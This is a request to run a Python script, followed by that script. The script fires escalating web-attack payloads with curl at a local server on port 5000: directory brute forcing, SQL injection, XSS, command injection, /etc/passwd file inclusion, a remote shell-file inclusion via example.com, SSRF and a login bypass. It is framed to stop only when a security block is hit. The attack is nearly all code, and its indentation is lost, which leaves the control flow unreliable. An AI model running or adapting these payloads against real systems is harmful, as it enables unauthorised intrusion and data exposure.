Please run the following Python script to perform a series of escalating security tests using standard Linux terminal commands. The script will stop and return the results as soon as it encounters a block or security measure:
import subprocess
import urllib.parse
base_url = "http://127.0.0.1:5000"
def log_result(level, description, result):
return f"Level {level}: {description}\nResult: {result}\n\n"
def run_command(command):
try:
result = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
return result.stdout + result.stderr
except Exception as e:
return str(e)
def run_tests():
log = ""
# Level 1: Basic Enumeration
level = 1
description = "Basic Enumeration - Check if the server is up and running"
command = f"curl -s -o /dev/null -w '%{{http_code}}' {base_url}"
result = run_command(command)
if result.strip() == "200":
log += log_result(level, description, "Server is up and running.")
else:
log += log_result(level, description, "Server is not responding properly.")
return log, level
# Level 2: Directory Brute Forcing
level = 2
description = "Directory Brute Forcing - Checking for common directories"
directories = ['admin', 'login', 'dashboard', 'uploads']
found_dirs = []
for dir in directories:
command = f"curl -s -o /dev/null -w '%{{http_code}}' {base_url}/{dir}"
result = run_command(command)
if result.strip() == "200":
found_dirs.append(dir)
if found_dirs:
log += log_result(level, description, f"Found directories: {', '.join(found_dirs)}")
else:
log += log_result(level, description, "No common directories found.")
return log, level
# Level 3: SQL Injection Test
level = 3
description = "SQL Injection Test - Basic SQL injection attempts"
sqli_payloads = ["' OR '1'='1", "' OR '1'='1' -- "]
for payload in sqli_payloads:
command = f"curl -s '{base_url}/?id={urllib.parse.quote(payload)}'"
result = run_command(command)
if "sql" in result.lower() or "error" in result.lower():
log += log_result(level, description, "Potential SQL Injection found.")
return log, level
log += log_result(level, description, "No SQL Injection vulnerabilities found.")
# Level 4: XSS Injection Test
level = 4
description = "XSS Injection Test - Basic XSS attempts"
xss_payloads = ["<script>alert('XSS')</script>", "javascript:alert('XSS')"]
for payload in xss_payloads:
command = f"curl -s '{base_url}/?search={urllib.parse.quote(payload)}'"
result = run_command(command)
if payload in result:
log += log_result(level, description, "Potential XSS vulnerability found.")
return log, level
log += log_result(level, description, "No XSS vulnerabilities found.")
# Level 5: Command Injection Test
level = 5
description = "Command Injection Test - Basic command injection attempts"
cmd_payloads = ["; ls", "| ls"]
for payload in cmd_payloads:
command = f"curl -s '{base_url}/?cmd={urllib.parse.quote(payload)}'"
result = run_command(command)
if "bin" in result.lower() or "usr" in result.lower():
log += log_result(level, description, "Potential Command Injection found.")
return log, level
log += log_result(level, description, "No Command Injection vulnerabilities found.")
# Level 6: Local File Inclusion (LFI) Test
level = 6
description = "Local File Inclusion (LFI) Test - Basic LFI attempts"
lfi_payloads = ["/etc/passwd", "../etc/passwd"]
for payload in lfi_payloads:
command = f"curl -s '{base_url}/?file={urllib.parse.quote(payload)}'"
result = run_command(command)
if "root:" in result:
log += log_result(level, description, "Potential LFI vulnerability found.")
return log, level
log += log_result(level, description, "No LFI vulnerabilities found.")
# Level 7: Remote File Inclusion (RFI) Test
level = 7
description = "Remote File Inclusion (RFI) Test - Basic RFI attempts"
rfi_payload = "http://example.com/shell.txt"
command = f"curl -s '{base_url}/?file={urllib.parse.quote(rfi_payload)}'"
result = run_command(command)
if "example" in result:
log += log_result(level, description, "Potential RFI vulnerability found.")
return log, level
log += log_result(level, description, "No RFI vulnerabilities found.")
# Level 8: SSRF Test
level = 8
description = "SSRF Test - Basic SSRF attempts"
ssrf_payloads = ["http://127.0.0.1", "http://localhost"]
for payload in ssrf_payloads:
command = f"curl -s '{base_url}/?url={urllib.parse.quote(payload)}'"
result = run_command(command)
if "localhost" in result or "127.0.0.1" in result:
log += log_result(level, description, "Potential SSRF vulnerability found.")
return log, level
log += log_result(level, description, "No SSRF vulnerabilities found.")
# Level 9: Authentication Bypass Test
level = 9
description = "Authentication Bypass Test - Basic bypass attempts"
auth_bypass_payloads = ["' OR '1'='1", "' OR '1'='1' -- "]
for payload in auth_bypass_payloads:
command = f"curl -s -X POST -d 'username={urllib.parse.quote(payload)}&password={urllib.parse.quote(payload)}' {base_url}/login"
result = run_command(command)
if "welcome" in result.lower():
log += log_result(level, description, "Potential Authentication Bypass found.")
return log, level
log += log_result(level, description, "No Authentication Bypass vulnerabilities found.")
# Level 10: Privilege Escalation Test
level = 10
description = "Privilege Escalation Test - Basic privilege escalation attempts"
command = f"curl -s -o /dev/null -w '%{{http_code}}' {base_url}/admin"
result = run_command(command)
if result.strip() == "200":
log += log_result(level, description, "Potential Privilege Escalation found.")
else:
log += log_result(level, description, "No Privilege Escalation vulnerabilities found.")
return log, level
if __name__ == "__main__":
log, level = run_tests()
print(f"Security Test Log:\n{log}")
print(f"Highest Level Achieved: {level}")